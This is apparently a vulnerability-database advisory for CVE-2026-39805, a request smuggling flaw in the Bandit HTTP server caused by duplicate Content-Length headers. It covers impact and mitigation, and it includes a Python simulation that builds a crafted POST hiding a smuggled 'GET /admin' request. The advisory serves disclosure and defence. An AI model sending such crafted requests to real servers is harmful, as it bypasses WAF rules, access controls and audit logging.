CVE-2026-39805: CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in mtrudel bandit
Inconsistent Interpretation of HTTP Requests vulnerability in mtrudel bandit allows HTTP request smuggling via duplicate Content-Length headers. 'Elixir.Bandit.Headers':get_content_length/1 in lib/bandit/headers.ex uses List.keyfind/3, which returns only the first matching header. When a request contains two Content-Length headers with different values, Bandit silently accepts it, uses the first value to read the body, and dispatches the remaining bytes as a second pipelined request on the same keep-alive connection. RFC 9112 §6.3 requires recipients to treat this as an unrecoverable framing error. When Bandit sits behind a proxy that picks the last Content-Length value and forwards the request rather than rejecting it, an unauthenticated attacker can smuggle requests past edge WAF rules, path-based ACLs, rate limiting, and audit logging. This issue affects bandit: before 1.11.0.
AI Analysis
Technical Summary
The vulnerability arises in the Elixir.Bandit.Headers module: get_content_length/1 looks the header up with List.keyfind/3, which returns only the first matching tuple, so any further Content-Length fields are never examined. When a request carries two Content-Length headers with differing values, Bandit reads exactly as many body bytes as the first value says and then treats whatever follows as the next pipelined request on the same keep-alive connection. RFC 9112 §6.3 requires a recipient to treat conflicting Content-Length values as an unrecoverable framing error and close the connection; Bandit does not enforce this. The bug is only exploitable when Bandit is deployed behind a front-end proxy that honours the last Content-Length value and forwards the request instead of rejecting it: the proxy inspects and logs one request, while Bandit executes two, and the second one never passed through the edge WAF rules, path-based ACLs, rate limiting or audit logging. All bandit versions before 1.11.0 are affected. The CVSS 4.0 base score is 6.3 (medium), reflecting a network attack vector, low attack complexity, no privileges or user interaction required, and an attack requirement that is deployment-dependent (a front-end that resolves the conflict differently from Bandit).
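The framing discrepancy described above, as an added example written for this page. It is a Python simulation, not Bandit's Elixir code: three body-length policies (first value wins, mirroring a first-match lookup like List.keyfind/3; last value wins, the forwarding-proxy behaviour the advisory describes; and the strict RFC 9112 §6.3 rule that rejects conflicting values) are run over the same constructed keep-alive byte stream. The request bytes, the `example.test` host and the `/admin` path are constructed for illustration.

```python
# Added example (not Bandit's code): simulate how a last-value front-end and a
# first-value backend frame one attacker-controlled byte stream differently.
from __future__ import annotations

CRLF = b"\r\n"


class FramingError(Exception):
    """Raised when a request's body length cannot be determined unambiguously."""


def parse_head(stream: bytes) -> tuple[bytes, list[tuple[str, str]], bytes]:
    """Split one request head off a byte stream.
    Returns (request_line, [(lowercased name, value), ...], remaining bytes)."""
    head, sep, rest = stream.partition(CRLF + CRLF)
    if not sep:
        raise FramingError("incomplete request head")
    lines = head.split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().decode().lower(), value.strip().decode()))
    return lines[0], headers, rest


def content_length_first(headers: list[tuple[str, str]]) -> int:
    """Lenient: first Content-Length wins (what a first-match lookup such as
    List.keyfind/3 gives the vulnerable Bandit)."""
    for name, value in headers:
        if name == "content-length":
            return int(value)
    return 0


def content_length_last(headers: list[tuple[str, str]]) -> int:
    """Lenient: last Content-Length wins (the forwarding-proxy behaviour)."""
    length = 0
    for name, value in headers:
        if name == "content-length":
            length = int(value)
    return length


def content_length_strict(headers: list[tuple[str, str]]) -> int:
    """RFC 9112 section 6.3: every Content-Length value, including members of
    a comma-separated list, must agree; otherwise reject the request."""
    values: set[int] = set()
    for name, value in headers:
        if name != "content-length":
            continue
        for member in value.split(","):
            member = member.strip()
            if not member.isdigit():
                raise FramingError(f"invalid Content-Length value {member!r}")
            values.add(int(member))
    if len(values) > 1:
        raise FramingError(f"conflicting Content-Length values {sorted(values)}")
    return values.pop() if values else 0


def frame_requests(stream: bytes, policy) -> list[tuple[bytes, bytes]]:
    """Frame every request out of a keep-alive stream, using `policy` to pick
    the body length. Returns [(request_line, body), ...] as a server sees them."""
    seen = []
    while stream:
        request_line, headers, rest = parse_head(stream)
        length = policy(headers)
        seen.append((request_line, rest[:length]))
        stream = rest[length:]
    return seen


# Constructed attacker payload. The first Content-Length covers only "abcd";
# the second also covers a complete second request appended after it.
SMUGGLED = b"GET /admin HTTP/1.1" + CRLF + b"Host: example.test" + CRLF + CRLF
BODY = b"abcd"
ATTACK = CRLF.join([
    b"POST / HTTP/1.1",
    b"Host: example.test",
    b"Content-Length: %d" % len(BODY),
    b"Content-Length: %d" % (len(BODY) + len(SMUGGLED)),
    b"",
    BODY + SMUGGLED,
])


def front_end_view() -> list[tuple[bytes, bytes]]:
    """What a last-value proxy believes it inspected and forwarded: one POST."""
    return frame_requests(ATTACK, content_length_last)


def vulnerable_backend_view() -> list[tuple[bytes, bytes]]:
    """What a first-value backend executes: the POST plus the smuggled GET."""
    return frame_requests(ATTACK, content_length_first)


def strict_backend_rejects(stream: bytes = ATTACK) -> bool:
    """True if the RFC-conformant policy refuses to frame the stream at all."""
    try:
        frame_requests(stream, content_length_strict)
    except FramingError:
        return True
    return False


if __name__ == "__main__":
    print("front-end saw:", [line for line, _ in front_end_view()])
    print("vulnerable backend saw:", [line for line, _ in vulnerable_backend_view()])
    print("strict backend rejects:", strict_backend_rejects())
```

The front-end policy yields a single POST with a 47-byte body, the first-value policy yields that POST with a 4-byte body followed by a GET /admin that the front-end never saw as a request, and the strict policy raises before any request is dispatched, which is the behaviour RFC 9112 §6.3 asks for and the behaviour to look for in any front-end placed in front of an unpatched Bandit.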
Potential Impact
An unauthenticated attacker can exploit this vulnerability by sending a single crafted request with two differing Content-Length headers through a front-end that honours the last value and forwards the request to Bandit. Because the front-end frames one request and Bandit frames two, the second request reaches the application without passing the edge's web application firewall, path-based access control lists, rate limiting or audit logging. The practical consequence is that requests the edge would have blocked or at least recorded can reach backend routes unobserved. The advisory gives no indication of direct code execution or data leakage; the impact is confined to bypassing controls enforced at the proxy layer.
Mitigation Recommendations
The advisory lists bandit versions before 1.11.0 as affected, so upgrading to bandit 1.11.0 or later is the primary remediation; confirm the fixed version against the vendor advisory before relying on it. Where the upgrade cannot be rolled out immediately, terminate HTTP at a proxy or gateway that enforces RFC 9112 §6.3, that is, one that rejects rather than forwards any request carrying multiple Content-Length fields with differing values, or a Content-Length value that is not a single decimal number. Review proxy and WAF configuration so that every hop frames requests identically, since the smuggling only works when the edge and Bandit disagree about where a request ends, and monitor vendor channels for further updates.
Technical Details
- Data Version: 5.2
- Assigner Short Name: EEF
- Date Reserved: 2026-04-07T12:28:54.916Z
- CVSS Version: 4.0
- State: PUBLISHED
- Remediation Level: null
Threat ID: 69f5124bcbff5d86105840de
Added to database: 5/1/2026, 8:51:23 PM
Last enriched: 5/1/2026, 9:06:56 PM
Last updated: 5/2/2026, 5:51:00 AM